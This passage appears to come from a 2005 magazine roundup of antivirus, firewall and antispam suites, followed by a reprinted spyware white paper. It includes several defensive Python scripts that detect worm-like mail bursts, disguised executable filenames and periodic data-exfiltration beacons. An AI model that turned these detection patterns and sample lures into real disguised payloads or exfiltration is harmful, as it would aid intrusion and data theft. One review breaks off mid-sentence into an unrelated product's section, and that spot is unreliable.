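        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        stamp, rest = line.split(" ", 1)
        sender, rest = rest.split(" -> ", 1)
        rcpts, _, attachment = rest.partition(" ")
        messages.append(Message(
            when=datetime.fromisoformat(stamp),
            sender=sender.strip(),
            recipients=tuple(r for r in rcpts.split(",") if r),
            attachment=attachment.strip(),
        ))
    return messages


def detect_bursts(messages, max_recipients=MAX_RECIPIENTS,
                  max_per_window=MAX_PER_WINDOW,
                  max_spread=MAX_ATTACHMENT_SPREAD, window=WINDOW):
    """Return (sender, reason) alerts, one per message that trips a check."""
    alerts = []
    recent = {}   # sender -> deque of send times still inside the window
    spread = {}   # (sender, attachment) -> recipients it has been sent to
    for m in sorted(messages, key=lambda x: x.when):
        # Check 1: one message addressed to too many receivers.
        if len(m.recipients) > max_recipients:
            alerts.append((m.sender, "too_many_recipients"))
        # Check 2: sliding window over this sender's recent messages.
        q = recent.setdefault(m.sender, deque())
        q.append(m.when)
        while m.when - q[0] > window:
            q.popleft()
        if len(q) > max_per_window:
            alerts.append((m.sender, "burst"))
        # Check 3: the same attachment fanning out to many contacts, the
        # worm-like pattern; alert once, at the moment the limit is crossed.
        if m.attachment:
            seen = spread.setdefault((m.sender, m.attachment), set())
            before = len(seen)
            seen.update(m.recipients)
            if before <= max_spread < len(seen):
                alerts.append((m.sender, "attachment_spread"))
    return alerts


def summarize(alerts):
    """Collapse alerts into {sender: sorted distinct reasons}."""
    out = {}
    for sender, reason in alerts:
        out.setdefault(sender, set()).add(reason)
    return {s: sorted(r) for s, r in out.items()}


# Constructed sample log: a normal user, one oversized mailing, and a phone
# that behaves like the MMS worm described in section 4.3.
SAMPLE_LOG = """
# time sender -> recipients [attachment]
2005-03-01T09:00:00 alice@example.com -> bob@example.com report.doc
2005-03-01T09:20:00 alice@example.com -> carol@example.com,dave@example.com
2005-03-01T09:30:00 mallory@example.com -> a@x,b@x,c@x,d@x,e@x,f@x,g@x,h@x,i@x,j@x,k@x
2005-03-01T10:00:00 +15550001 -> +15550002 update.sis
2005-03-01T10:01:00 +15550001 -> +15550003 update.sis
2005-03-01T10:02:00 +15550001 -> +15550004 update.sis
2005-03-01T10:03:00 +15550001 -> +15550005 update.sis
2005-03-01T10:04:00 +15550001 -> +15550006 update.sis
2005-03-01T10:05:00 +15550001 -> +15550007 update.sis
2005-03-01T10:06:00 +15550001 -> +15550008 update.sis
"""

if __name__ == "__main__":
    for sender, reasons in summarize(
            detect_bursts(parse_log(SAMPLE_LOG.splitlines()))).items():
        print(sender, reasons)
```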

Other features include modules for privacy protection, which
include cookie control, ad blocking and protection from malicious
scripts. There’s also a parental lock for preventing access to
sites unsuitable for children.

Pros: Excellent firewall; antivirus and antispam.

Cons: Antispam doesn’t filter your existing inbox.

Panda Platinum Internet Security 2005

Panda Platinum Internet Security 2005 is designed to be the only
package you will need to protect yourself from all kinds of
problems that you can get into while online. The package integrates
an antivirus application, a spam filter, a firewall, and even
parental control technology that can block objectionable content
such as pornographic sites.
The antivirus is based on Panda’s TruPrevent technology, which works
on an advanced heuristics engine that can block out most malicious
code on its own. That, combined with the constant updates in the
form of virus signatures from Panda, makes the antivirus a very
strong contender. As with all good antivirus software, this one
also has a real-time scanner that checks files on access and a
system scanner for on demand and scheduled scans. The antivirus is
highly proficient in detecting and cleaning spyware; in fact, it’s
known to be one of the best spyware cleaners in an antivirus
package.

However, the firewall module provided by Sygate leaves a lot to be
desired. Though the firewall is pretty good at keeping your
computer invisible to prying eyes, it’s definitely not the most
secure option out there. A regular trojan attack would be
sufficient to humble the firewall’s defences.

The antispam module integrates well with common e-mail clients such
as Outlook Express and Eudora. Unfortunately, this too is not
really as secure as we would like it to be. It lacks features such
as intelligent mail sorting.
Pros: Feature packed; great antivirus and anti-spyware.

Cons: Antispam not very effective; firewall needs to be more
secure.


Trend Micro PC-cillin Internet Security 2005

PC-cillin Internet Security 2005 includes an antivirus, a
full-fledged firewall and also spyware and spam blocking tools.
Just as the name suggests, it’s an overall solution to all kinds of
threats you can face while surfing the Internet.


First up, the antivirus system is commendable for its silent and
stealthy performance. With absolutely no drop in system
performance, you’ll hardly even notice that it’s there. Even when
scanning disks, you can continue with basic tasks without noticing
a drop in system performance. Also, its feature set is par for the
course, with real-time as well as on demand and on schedule
scanning.


Though this suite does not scan for spyware in real-time, it
automatically scans for spyware as well when running a virus scan.
You can also run the spyware scanner separately. When PC-cillin
detects potential spyware, it gives you the option of deleting the
program or going to Trend Micro’s support site to learn more about
it. The only problem is that the spyware scanner is a little
paranoid, and even detects regular adware programs as spyware,
which may mean that a few adware-supported programs you like will
stop working after a spyware cleansing.

Trend Micro’s spam filter tags any e-mail with objectionable
content with the word “SPAM” in the subject line. This allows for
easy rule filtering and prevents potentially important e-mail from
being deleted automatically by the application. The spam feature
also includes customisable “whitelists” and “blacklists” and the
ability to submit improperly tagged e-mail directly to the analysts
at Trend Micro.

The personal firewall comes with selectable profiles that best
match your use. It has the ability to automatically switch profiles
when you change networks, which is extremely handy for laptop
users. The firewall silences ports, keeping you virtually invisible
on the Internet, and also controls network traffic to stop worms
from spreading.

Pros: Light on the system; great interface.

Cons: No real-time spyware detection.
Security for a Home User

Home users are generally more casual when it comes to security
threats than corporations. Firstly, home users don’t like spending
too much for suites that probably wouldn’t be any more effective
than a good antivirus, for the level of security threats they face.
Many home users prefer to use their PC for entertainment purposes,
so having a league of security related software running in the
background is not an option, especially when you are trying to eke
out maximum performance from your DVD player, or when playing a
game. You need something light and effective.
Norton Antivirus 2005

Over the years, Symantec’s antivirus services have proved to be the
first place that one looks to find information on the latest virus
outbreaks. Norton Antivirus is one of the most highly used
commercial antivirus packages in India, mainly due to its ease of
use and availability. Norton Antivirus 2005 is the latest in
Symantec’s desktop antivirus solutions.

Norton AntiVirus 2004 had a host of missing features, which Symantec
have remedied in the 2005 edition. The most notable is an
integrated lightweight firewall titled “Norton Internet Worm
Protection” that blocks out any unwanted incoming traffic. Though
it is effective in most cases, it doesn’t monitor any outbound
traffic, which makes it less effective as compared to a good
standalone firewall.


Like its predecessor, Norton Antivirus 2005 is a robust solution
against viruses and also against other Net nuisances such as
spyware, adware, trojans, etc. Oddly though, the Norton real-time
scanner doesn’t seem to look for spyware, and you can only detect
spyware when performing a system scan.

On the downside, Norton Antivirus is still quite system heavy,
which may put off a lot of performance enthusiasts. Don’t expect to
do much on your computer while running a system scan, as that will
easily drain most of your resources, making every other application
painfully slow. Nonetheless, Symantec’s reputation with virus
definitions, the extensive protection against all kinds of
malicious software and the best interface among all antivirus
packages make Norton a strong option.

Pros: Excellent interface; great virus definition support.

Cons: Significantly system heavy; no real-time spyware detection.


McAfee VirusScan Home 9.0

McAfee antivirus packages have always been a great option, but if
there was one particular flaw that made some users shy away from
it, it was the complicated interface. Version 9.0’s tabular
interface, however, makes sure that all the required options are
well sorted and easy to find.


McAfee is generally light on the system as it quietly keeps a watch
on all the files accessed by your system. Just like Norton Antivirus
2005, it can detect viruses, trojans and worms in real-time, but
detects spyware and adware only during the system scan. The good
thing is that running a system scan at regular intervals is not
really a big issue, because even though the system scanning process
takes longer than other antivirus packages, it uses up a lot less
resources, which means that you can continue your work while the
system is being checked.

One  important  feature  missing  from  VirusScan  9.0  is  a firewall 
or  at  least  a port-blocking  technology  to  stop  unsolicited  inbound 
packets.  These  days  having  a firewall  on  your  system  is  a must, 
especially  with  the  colossal  rise  in  malicious  software  threats. 
Many  other  packages  have  spotted  this  danger  and  now  come  with 
inbuilt  firewalls.  If  you  already  have  a sturdy  firewall  running  in 
your  system  and  only  need  a good  antivirus  package  that  doesn’t 
take  its  toll  on  your  resources,  then  McAfee  VirusScan  Home  9.0  is 
definitely  worth  some  consideration. 

Pros:  Improved  interface;  not  too  heavy  on  system  resources. 
Cons:  No  integrated  firewall;  no  real-time  spyware  detection. 


NOD32 Antivirus System 2.0

NOD32 is a multi-award-winning antivirus package that's slowly gaining popularity as the antivirus to have. There are just too many strong features in NOD32 to sideline it while deciding which antivirus to buy.

The NOD32 Antivirus System is essentially divided into four parts:

o NOD32 is the complete on-demand and scheduled system scanner.

o AMON is the real-time scanner that checks files on access.

o DMON protects the system from viruses contained in documents, such as macro viruses in Microsoft Word documents.

o IMON scans incoming POP3 and HTTP streams, protecting you from Web and e-mail threats.

[Screenshot: NOD32 Control Center]

One feature that most advanced users enjoy is its extensive tweaking capability. However, casual users may be put off by the not-so-friendly interface. NOD32 is an ideal solution for gamers who need every ounce of their system resources while playing: there isn't a noticeable drop in performance, which makes it quite all right to keep the antivirus running while playing games.

The lack of a firewall can be considered a drawback, but the heuristics engine in NOD32 is one of the best in the business. Even though virus definition updates arrive almost daily, the heuristics engine on its own can often block malicious software that has not yet been added to the definitions, which makes it a valuable antivirus even when it is not completely up to date.

NOD32 protects against all kinds of malicious code, namely viruses, trojans, worms, spyware and adware.

Pros: Very light on the system; excellent heuristics engine; frequent virus definition updates in small packages.

Cons: No integrated firewall; interface aimed at advanced users.
Avast! 4 Home Edition

Many home users would think twice about paying for an antivirus package. After all, paying a decent sum every year to protect data that may not be all that important to them isn't exactly an attractive idea. That's where the beauty of freeware comes in: Avast! is free for home use, and you can check it out on the Digit DVD.

While freeware, to most people, usually translates to an amateurish home project by a pimply-faced teenager, we assure you that's not the case here. Avast! features outstanding malware detection together with high performance. The interface is simple and easy to follow for most purposes. There's also an option to skin the interface, just in case you want to give your antivirus a new look. Why you would want to do that to an antivirus, however, is beyond us.

The antivirus consists of a scanner that checks files for viruses on access, on demand or on schedule. There's also a real-time scanner for your incoming e-mail, which stops e-mail-based viruses and worms before they get a chance to act up. However, the e-mail functionality is offered for Microsoft Outlook only.

The virus scanner is based on an intelligent heuristic system that detects viruses on your computer and in your e-mail. Virus definitions are updated regularly, and Avast! connects to the update server and automatically downloads the updates (which are generally quite tiny) whenever you connect to the Internet.

Pros: Free; light on the system and very effective against viruses.

Cons: Bare-bones antivirus with no frills such as a firewall or spyware scanner.
Specialised Solutions

Though most suites are quite proficient when it comes to monitoring all kinds of malicious threats, there may be some areas where they don't perform at the level they should. For example, most antivirus solutions have real-time scanners for all kinds of malicious software, but not for spyware, which happens to be a pretty major threat today. For that you may require specialised software that can secure your PC from these resource-hungry programs. The same logic applies to some of the other security issues that could be a bit out of the league of your resident antivirus.
EmailProtect

EmailProtect is a dedicated spam-filtering program that doesn't rely on the simple whitelists and blacklists that other programs depend on. Instead, you fine-tune categories and preferences to teach EmailProtect how to do the work for you. EmailProtect relies on your settings to filter your inbox: you choose the keywords, e-mail addresses, domain names, and even servers to watch for, and the filter takes over. You can opt to allow or block using over 20 categories (such as Adult, Drugs/Alcohol, Shopping, or Pornography). Categories are predefined, which means you don't have to spend time deciding the details of each; you just pick which you want allowed or blocked.

EmailProtect integrates into your e-mail client and adds a quarantine area. If a message is suspect, the program sends it to quarantine and, if you want, notifies you immediately. From there, you can move the e-mail back to your inbox, delete it, or use it to create new filtering rules. The tools are simple to use and everything you need is just a button click away.
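A rule-driven filter of the kind just described, written here as an added example (it is not EmailProtect's code and does not reproduce its internals): the category table, the rule precedence (an allow-listed sender always wins, then explicit address, domain and relay-server blocks, then categories and keywords) and the sample messages are all assumptions constructed for the example.

```python
"""Rule-driven inbox filter with a quarantine, modelled on the EmailProtect
description.  Added example, not EmailProtect's code: the category table,
the rule precedence and the sample messages are assumptions."""
from dataclasses import dataclass, field

# Constructed category table: a category is simply a set of phrases.
CATEGORIES = {
    "Adult": {"xxx", "adult content"},
    "Drugs/Alcohol": {"viagra", "cheap pills"},
    "Shopping": {"discount", "limited offer", "buy now"},
}


@dataclass
class Message:
    sender: str
    subject: str
    body: str
    relay: str = ""   # hostname of the last relay, from a Received: header


@dataclass
class Rules:
    allow_addresses: set = field(default_factory=set)
    block_addresses: set = field(default_factory=set)
    block_domains: set = field(default_factory=set)
    block_servers: set = field(default_factory=set)
    block_keywords: set = field(default_factory=set)
    block_categories: set = field(default_factory=set)


def categorise(msg):
    """Return the categories whose phrases occur in the subject or body."""
    text = (msg.subject + " " + msg.body).lower()
    return {cat for cat, phrases in CATEGORIES.items()
            if any(p in text for p in phrases)}


def decide(msg, rules):
    """Return ("deliver" | "quarantine", reason).  An allow-listed sender
    always wins; otherwise the first block rule that matches decides."""
    addr = msg.sender.lower()
    domain = addr.rpartition("@")[2]
    text = (msg.subject + " " + msg.body).lower()
    if addr in rules.allow_addresses:
        return "deliver", "sender allow-listed"
    if addr in rules.block_addresses:
        return "quarantine", f"blocked address {addr}"
    if domain in rules.block_domains:
        return "quarantine", f"blocked domain {domain}"
    if msg.relay and msg.relay.lower() in rules.block_servers:
        return "quarantine", f"blocked server {msg.relay.lower()}"
    hit = categorise(msg) & rules.block_categories
    if hit:
        return "quarantine", "blocked category " + ", ".join(sorted(hit))
    words = sorted(k for k in rules.block_keywords if k in text)
    if words:
        return "quarantine", "blocked keyword " + ", ".join(words)
    return "deliver", "no rule matched"


class Mailbox:
    """Inbox plus quarantine; quarantined mail can be released, deleted,
    or turned into a new rule, as the product description outlines."""

    def __init__(self, rules):
        self.rules = rules
        self.inbox = []
        self.quarantine = []   # list of (message, reason)

    def receive(self, msg):
        action, reason = decide(msg, self.rules)
        if action == "deliver":
            self.inbox.append(msg)
        else:
            self.quarantine.append((msg, reason))
        return action

    def release(self, index):
        """Move a quarantined message back to the inbox."""
        msg, _ = self.quarantine.pop(index)
        self.inbox.append(msg)
        return msg

    def delete(self, index):
        return self.quarantine.pop(index)[0]

    def block_sender_domain(self, index):
        """Create a new rule from a quarantined message: block its domain."""
        msg, _ = self.quarantine[index]
        domain = msg.sender.lower().rpartition("@")[2]
        self.rules.block_domains.add(domain)
        return domain


def run_demo():
    """Constructed traffic through the mailbox; returns it for inspection."""
    rules = Rules(allow_addresses={"alice@corp.example"},
                  block_servers={"open-relay.example"},
                  block_keywords={"unsubscribe"},
                  block_categories={"Adult", "Drugs/Alcohol"})
    mb = Mailbox(rules)
    mb.receive(Message("alice@corp.example", "Re: 10% discount for staff",
                       "Forwarding the offer from HR."))
    mb.receive(Message("promo@cheap-pills.example", "Limited offer: viagra",
                       "Buy now!"))
    mb.receive(Message("bob@partner.example", "Project plan",
                       "See attached.", relay="Open-Relay.example"))
    mb.receive(Message("carol@friend.example", "Lunch?", "Tomorrow at 1?"))
    mb.block_sender_domain(0)          # learn a rule from the first catch
    mb.receive(Message("sales@cheap-pills.example", "Hello", "Great deals."))
    return mb


if __name__ == "__main__":
    mb = run_demo()
    print("inbox:", [m.sender for m in mb.inbox])
    for msg, reason in mb.quarantine:
        print("quarantined:", msg.sender, "-", reason)
```

Note that the allow-list check runs first, so the "discount" phrase in Alice's subject does not trip the Shopping category; the order of the checks is the policy, and it is worth writing down explicitly rather than leaving it to whichever rule happens to match first.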

EmailProtect features a protected way to preview e-mails with images. You can turn image display on or off quickly. You can also
It's easy enough for casual users to simply install it and then forget about spyware, but at the same time it features some serious customisation options for advanced users.

Pros: Real-time spyware scanning; Consumerware section.

Cons: None.

Wormguard 3

Wormguard is arguably the best protection you can have against Internet worms. When your firewall and antivirus fail to detect a worm infecting your computer, specialised software such as Wormguard can come to the rescue. Its heuristics engine analyses files generically rather than relying on signatures for known worms.

Wormguard provides real-time scanning of every file that is executed, to make sure it isn't infected before the worm gets a chance to act up. It also neutralises several filename tricks that worms use to fool Windows users, such as hidden extensions, multiple file extensions and excessive spaces in filenames.
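The three filename tricks just mentioned can be checked with a few string rules. The script below is an added example, not Wormguard's code; the extension sets, the eight-space threshold and the sample attachment names are assumptions made for the example, and `displayed_name` models only the two Explorer behaviours the rules depend on (hiding known extensions, and never showing a handful of extensions at all).

```python
"""Heuristic checks for deceptive attachment names: hidden extensions,
multiple extensions and runs of spaces.  Added example, not Wormguard's
code; extension sets and the space threshold are assumptions."""
import re

# Extensions Windows executes directly or hands to a script host
# (assumed list, not exhaustive).
EXECUTABLE_EXTS = {"exe", "com", "scr", "pif", "bat", "cmd", "vbs", "vbe",
                   "js", "jse", "wsf", "wsh", "hta", "cpl", "lnk", "msi"}
# Extensions users regard as harmless, hence the ones a lure imitates.
BENIGN_EXTS = {"txt", "doc", "xls", "pdf", "jpg", "jpeg", "gif", "png",
               "mp3", "zip", "htm", "html"}
# Extensions Explorer never displays, whatever the folder options say
# (assumed list of types carrying the NeverShowExt registry flag).
ALWAYS_HIDDEN = {"lnk", "pif", "url", "scf", "shs", "shb"}
SPACE_RUN = re.compile(r" {8,}")      # assumed threshold for "excessive"


def extensions(filename):
    """All dot-separated extensions, lower-cased and stripped of padding."""
    return [p.strip().lower() for p in filename.split(".")[1:]]


def displayed_name(filename, hide_known=True):
    """What Explorer would show for this file.  With 'Hide extensions for
    known file types' on, the final known extension disappears; the
    ALWAYS_HIDDEN ones disappear even with it off."""
    head, dot, last = filename.rpartition(".")
    if not dot:
        return filename
    last = last.strip().lower()
    if last in ALWAYS_HIDDEN or (hide_known and last in EXECUTABLE_EXTS | BENIGN_EXTS):
        return head
    return filename


def analyse_filename(filename):
    """Return the reasons a name looks deceptive; an empty list means clean."""
    reasons = []
    exts = extensions(filename)
    if not exts:
        return reasons
    last = exts[-1]
    # Multiple extensions: an executable wearing a harmless inner extension,
    # e.g. photo.jpg.exe, which Explorer shows as photo.jpg.
    if last in EXECUTABLE_EXTS and any(e in BENIGN_EXTS for e in exts[:-1]):
        reasons.append(f"executable {last!r} disguised as {exts[-2]!r}")
    # Excessive spaces: padding pushes the real extension out of view in
    # any column or dialog narrower than the name.
    if SPACE_RUN.search(filename):
        reasons.append("excessive spaces hide the real extension")
    # Hidden extension: a type Explorer never shows, so the name looks
    # like a bare document name even with extension hiding turned off.
    if last in ALWAYS_HIDDEN:
        reasons.append(f"extension {last!r} is never displayed by Explorer")
    return reasons


def scan(filenames):
    """Map each suspicious name to its reasons; clean names are omitted."""
    result = {}
    for name in filenames:
        reasons = analyse_filename(name)
        if reasons:
            result[name] = reasons
    return result


if __name__ == "__main__":
    # Constructed sample attachment names.
    samples = [
        "report.pdf",
        "setup.exe",
        "photo.jpg.exe",
        "invoice.pdf" + " " * 40 + ".exe",
        "holiday snaps.lnk",
    ]
    for name, reasons in scan(samples).items():
        print(f"shown as {displayed_name(name)!r}: " + "; ".join(reasons))
```

A plain `setup.exe` is deliberately not flagged: the rules target deception, not executables as such, and an antivirus or execution policy is the place to decide whether an undisguised program may run.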

The on-demand scanner provides deep scanning to detect password stealers, keystroke loggers, IRC worms, references to known worm authors, and so on.

Pros: Easy to use; highly effective.

Cons: Slightly outdated, but a new version is coming soon.
If you've gotten this far, you've probably learnt a lot already.

However, for those of you who like to go into the nitty-gritty of things, the white papers that follow should further improve your understanding of the topic at hand. Here, you'll find in-depth material on spyware, adware, the need for secure operating systems, network security best practices, and so on. And if you thought it's only Windows that's affected by viruses, there's also a paper on viruses that attack Unix systems.
I. Spyware And Adware

Source: “Spyware: The first thing you need to know is that you probably have it”, available at
ww2.websense.com/docs/WhitePapers/Spywarevouprobablyhaveit.pdf

Spyware, software installed on a computer usually without the user's knowledge or permission, along with adware and other similar software, gathers information and sends it back to the advertiser who initiated it or to other interested parties. Spyware can collect and transmit information such as keystrokes, Web surfing habits, passwords, e-mail addresses, and other sensitive information you may not want to share outside your organisation. Spyware also misuses system resources and bandwidth as it tracks and transmits information. More seriously, spyware can pose grave security, confidentiality, and compliance risks.

Spyware programs collect data on users and their computing behaviour and then transmit that information back to the spyware host server. These programs can also monitor keystrokes, scan files on hard drives, secretly install other programs, and even make changes to default computer settings. Spyware is often acquired surreptitiously when users download a 'real' application or file, visit certain Web sites, or click on a deceptive pop-up window. Unlike spyware, which is acquired without user knowledge or approval, adware is installed with permission, usually after the user agrees to the terms of a long and confusing End User License Agreement (EULA). These more benign programs also collect information about users or user habits, but typically use it to tailor future pop-up advertisements to users' preferences for marketing purposes. These programs cause performance problems and use expensive computing resources: processing power, drive space, and bandwidth. They can also cause software conflicts with legitimate programs and affect employee productivity. Of most concern to organisations, however, is the fact that spyware compromises information security and consumes valuable IT Help Desk resources. Organisations whose investors and clients rely on them to safeguard personal, medical, and financial information need a way to prevent spyware from covertly accessing and transmitting critical corporate information. Similarly, organisations whose Help Desk resources are burdened with correcting spyware damage, often by 're-imaging' entire systems, need a way to prevent the corruption of their desktop computing environments in the first place.

The security measures currently in place in most organisations, a combination of a firewall, antivirus software, and spyware/adware removal programs, do not adequately address the threat of spyware. Since firewalls operate at the boundary of the network, they have no visibility into the spyware running inside the network. Antivirus solutions are not adequate either, since antivirus software typically doesn't include spyware signatures and cannot prevent spyware from transmitting information. And spyware removal programs, which are targeted at individual consumers rather than organisations, do not provide a centrally managed solution and do not adequately address the burden of application conflicts. Organisations need a way to keep spyware from gaining access to their systems in the first place. To do this, organisations must be able to prevent employees from visiting sites that distribute spyware and from downloading applications that are bundled with spyware. For spyware that may be brought onto desktops through other channels, such as home or mobile laptop use, or via CDs or flash drives, organisations also need a way to stop spyware from ever launching, thereby preventing the corruption of that desktop as well as the transmission of data back to host servers.

Some spyware programs collect information using 'keystroke loggers', which capture information about the user's computer activities, including cookies and time spent on certain sites. Some capture all keystrokes users make; others are more focused, recording Web sites visited, passwords, e-mails, credit card numbers, and so on. Most keyloggers are invisible and save recorded keystrokes into a log file that is transmitted periodically back to the host server. Some can even record both sides of instant messaging chat conversations (for example, MSN Messenger and Yahoo! Messenger).
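The periodic upload just described is something an egress log can reveal even when the boundary firewall inspects nothing: a timer-driven upload produces requests to one host at almost constant spacing, which ordinary browsing does not. The script below is an added example and not part of the white paper; the proxy log format, the sample lines, the minimum of four requests and the regularity threshold are all constructed for the example.

```python
"""Spot periodic 'phone home' traffic in Web proxy logs.  Added example,
not from the white paper: the log format, thresholds and log lines are
constructed for the example."""
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed proxy log: timestamp client method url status bytes_sent.
# 10.0.0.5 has a ~15-minute upload to one host mixed with normal browsing.
SAMPLE_LOG = """\
2005-03-01T09:00:00 10.0.0.5 POST http://stats.example-tracker.net/upload 200 4096
2005-03-01T09:00:07 10.0.0.5 GET http://intranet.example/news 200 1200
2005-03-01T09:15:01 10.0.0.5 POST http://stats.example-tracker.net/upload 200 4100
2005-03-01T09:21:44 10.0.0.5 GET http://www.example.com/ 200 8000
2005-03-01T09:30:02 10.0.0.5 POST http://stats.example-tracker.net/upload 200 4088
2005-03-01T09:45:00 10.0.0.5 POST http://stats.example-tracker.net/upload 200 4102
2005-03-01T09:52:13 10.0.0.5 GET http://www.example.com/about 200 5000
2005-03-01T10:00:01 10.0.0.5 POST http://stats.example-tracker.net/upload 200 4095
2005-03-01T09:03:10 10.0.0.9 GET http://www.example.com/ 200 8000
2005-03-01T09:40:55 10.0.0.9 GET http://www.example.com/ 200 8000
"""


def parse_log(text):
    """Yield (timestamp, client, host, bytes_sent) per well-formed line."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue                     # skip blank or malformed lines
        ts, client, _method, url, _status, size = fields
        yield datetime.fromisoformat(ts), client, urlsplit(url).hostname, int(size)


def find_beacons(text, min_requests=4, max_cv=0.2):
    """Return (client, host) pairs whose request spacing is suspiciously
    regular.  cv is the coefficient of variation (stdev / mean) of the
    gaps between consecutive requests: a timer-driven upload keeps it near
    zero, human browsing pushes it well above the assumed 0.2 threshold."""
    series = defaultdict(list)
    for ts, client, host, size in parse_log(text):
        series[(client, host)].append((ts, size))
    findings = []
    for (client, host), events in series.items():
        if len(events) < min_requests:
            continue                     # too few points to judge regularity
        events.sort()                    # log lines need not be in order
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue                     # duplicate timestamps, not a beacon
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            findings.append({
                "client": client, "host": host, "requests": len(events),
                "mean_interval_s": round(mean, 1), "cv": round(cv, 4),
                "bytes_out": sum(size for _, size in events),
            })
    return sorted(findings, key=lambda f: f["cv"])


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['client']} -> {f['host']}: {f['requests']} requests every "
              f"~{f['mean_interval_s']}s (cv={f['cv']}), {f['bytes_out']} bytes out")
```

The `bytes_out` total is the other half of the picture: regular spacing identifies the timer, and a steady trickle of uploaded bytes to a host the user never browsed is what distinguishes a log being shipped out from, say, a legitimate auto-refreshing page.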

Spyware can also read the computer's network adapter hardware address (MAC address) and IP address, and can combine that information with surfing habits and correlate it with any personal information provided during a 'free' software download or when a file attachment was opened. This information can then be traded with affiliate advertisers, building a complex dossier on individual users and what they like to do on the Internet.

Other programs are simple, 'useful' applications such as clocks, calendars, or mouse pointers, which are attractive bait for downloading spyware.

Although similar, adware is distinguished from spyware by the fact that, when downloading adware, the user is first given an opportunity to agree to its being placed on his or her computer. The explanation of an adware program and what it will do is often buried in a long, complex EULA that many users simply scroll through and accept without reading completely. In practice, adware acts as spyware. Both may trigger the display of pop-up or banner advertisements, and both may gather and transmit information from the user's computer.

How Spyware And Adware Can Be Acquired

o When users unknowingly give their permission while downloading or installing applications: Before installing most software programs, users are required to read and accept an End User License Agreement. But EULAs are long, confusing, and sometimes even deceptive. From a legal standpoint, everything may be duly disclosed in the EULA, but EULAs are often so long and complex that many users just click through them, never stopping to read them closely.

o Another method bypasses the security settings altogether by exploiting a bug in Internet Explorer versions 4 and 5. These versions allow Web scripts to gain access to the hard drive by overflowing the browser with data. Malicious Webmasters use this exploit to install spyware or modify the way the browser works.

o By simply visiting certain Web sites: Some spyware is secretly downloaded when a user launches a program acquired from a Web site. For example, a pop-up may notify the user that a special plug-in is required to run a video or movie file. In this case, what appears to be a legitimate plug-in could actually be spyware. Some spyware takes advantage of known vulnerabilities in the Microsoft Windows operating system and the Internet Explorer browser to secretly place spyware onto the user's computer. For example, one such method involves pushing malicious JavaScript and VBScript code to the user's Web browser when they visit a seemingly ordinary Web page. If the user's Internet Explorer security preferences are set to the lowest levels, the code can install spyware programs on the user's hard drive and even set them so that they launch automatically the next time the user reboots. It can also insert toolbars and other objects into the browser itself, essentially changing the way the browser works in the future, all without the user's permission.

o When users click on a deceptive or confusing pop-up: Some pop-up screens don't actually deliver advertisements but attempt to install unwanted software on your system and change your system configuration. These pop-ups can be very clever. Instead of "To install this program, click Yes," the prompt unexpectedly reads, "To install this program, click No." After clicking on these pop-ups, the user may find that the computer now displays new bookmarks and a different home page, as well as having unwanted software installed.

o During a peer-to-peer (P2P) file transfer or software download: Some spyware hides in shared directories on P2P networks, such as music sharing networks, and then spreads by infecting machines as users search for music. Other spyware is bundled with software that the user is intentionally downloading or purchasing. Some of these programs are bundled so tightly that, once installed, they are nearly impossible to get rid of.


What Do Spyware And Adware Do?

Employees may not even know that their computers have been infected until they find ads popping up all over their desktops. Or one day they may notice that their computers are working slower than usual, which happens when spyware programs are uploading information to a remote server or downloading new ads. These are only symptoms of what can be a very serious problem for an organisation.

Because spyware and adware exist as independent executable programs, they can monitor keystrokes, scan files on the hard drive, install other spyware programs, read cookies, and change the default home page of the Web browser. The programs continually relay this information back to the spyware author, who either uses it for advertising or marketing purposes or sells the information to another party.

Organisations whose very existence depends on protecting their valuable intellectual property cannot risk losing this competitive edge to information thieves. And organisations whose investors and clients rely on them to safeguard and protect personal, medical, and financial information, to name just a few, cannot afford to question whether critical information is being accessed by spyware. Organisations that need to demonstrate compliance with government regulations for information security are especially affected by spyware.

When spyware is part of the corporate computing environment, capturing confidential information or secretly perusing files and applications, regulatory compliance is virtually impossible. Even in computing environments that encrypt data, spyware remains a threat to the security of corporate data, because its keystroke-logging components capture input before it is encrypted.

Spyware and adware significantly increase the burden on IT Help Desk staff by causing application conflicts, malfunction of legitimate applications, and system instability. Many times, the IT Help Desk staff may have to re-image desktops and laptops to completely get rid of the problems caused by spyware.

When spyware and adware programs send information back to their home servers, they must connect to the Internet. In doing this, spyware can cause unexpected lockups and many other problems in Windows. When these events occur, calls to IT Help Desks increase as employees struggle to understand why their computers are crashing or business applications are running more slowly.

Some spyware binds itself to key operating system files and modifies critical registry entries. Attempts to delete these files can limit or even disable the system's Internet connection. For example, WebHancer is a spyware program that automatically launches at Windows startup. It monitors the Web sites being viewed and sends performance data back to WebHancer's servers. WebHancer has had conflicts with Microsoft IIS, causing problems with ASP scripts: it causes server-side ASP pages to stop functioning when the Web application settings are in medium or high isolation mode. WebHancer modifies the computer's Windows Sockets configuration, binding itself to Winsock so that all packets are passed through WebHancer. Deleting WebHancer files may therefore result in loss of the ability to connect to the Internet. Employees who consider themselves sophisticated computer users may try to locate and delete spyware programs themselves, inadvertently creating even greater problems, such as the WebHancer problem described above.

Since spyware and adware are piggyback programs that run separately from the program they accompany, they use additional processing power, hard drive space, and network bandwidth. Spyware uses memory and consumes bandwidth as it sends information back to the spyware's home base via the user's Internet connection. Because spyware uses memory and system resources, these applications running in the background can lead to system crashes or general system instability. They also consume a great deal of bandwidth and can create bottlenecks for critical business applications.

Having to close pop-up advertising windows and reset home pages that have been redirected by spyware is annoying and time consuming. Employee productivity is also affected by slow network performance and system instability. Many times, employees, unaware of the cause of their computer problems, contact the Help Desk frequently for support. This seriously affects employee productivity and places an increased burden on Help Desk staff.
Businesses that wish to guard against spyware, adware and other unwanted applications will benefit from supplementing traditional protection methods (including firewalls, intrusion detection systems and antivirus programs) with new strategies that address the unique characteristics of spyware. A comprehensive, company-wide spyware-prevention strategy should include multiple elements:

1. Detailed Acceptable Use Policies (AUP) For Company-owned Computers:

